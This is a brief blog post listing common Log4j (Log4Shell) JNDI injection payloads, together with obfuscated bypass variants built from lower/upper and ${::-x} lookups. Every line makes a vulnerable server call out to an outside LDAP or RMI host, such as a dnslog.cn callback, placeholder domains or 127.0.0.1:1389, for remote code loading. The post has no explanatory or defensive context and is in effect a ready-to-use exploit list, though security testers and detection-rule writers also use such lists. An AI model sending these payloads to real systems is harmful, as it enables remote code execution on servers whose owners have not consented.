log4j_payload

Common log4j payloads and bypasses

${jndi:ldap://xxx.dnslog.cn}
${${::-j}${::-n}${::-d}${::-i}:${::-r}${::-m}${::-i}://asdasd.asdasd.asdasd/poc}
${${::-j}ndi:rmi://asdasd.asdasd.asdasd/ass}
${jndi:rmi://adsasd.asdasd.asdasd}
${${lower:jndi}:${lower:rmi}://adsasd.asdasd.asdasd/poc}
${${lower:${lower:jndi}}:${lower:rmi}://adsasd.asdasd.asdasd/poc}
${${lower:j}${lower:n}${lower:d}i:${lower:rmi}://adsasd.asdasd.asdasd/poc}
${${lower:j}${upper:n}${lower:d}${upper:i}:${lower:r}m${lower:i}}://xxx xxxx.xx/poc}
${${::-j}${::-n}${::-d}${::-i}:${::-r}${::-m}${::-i}://127.0.0.1:1389/ass}
${${::-j}ndi:rmi://127.0.0.1:1389/ass}
${jndi:rmi://a.b.c}
${${lower:jndi}:${lower:rmi}://q.w.e/poc}
${${lower:${lower:jndi}}:${lower:rmi}://a.s.d/poc}
abcd-${${::-j}${::-n}${::-d}${::-i}:${::-r}${::-m}${::-i}://asdasd.asdasd.asdasd/poc}-aksdkashkd--

Source:

https://mp.weixin.qq.com/s/VmUh49pHcEumJIKsulW3gw


log4j_payload
https://blog.njcit.me/2022/12/16/poc_exp/log4j-payload/
Author: ccadmin
Published: December 16, 2022
License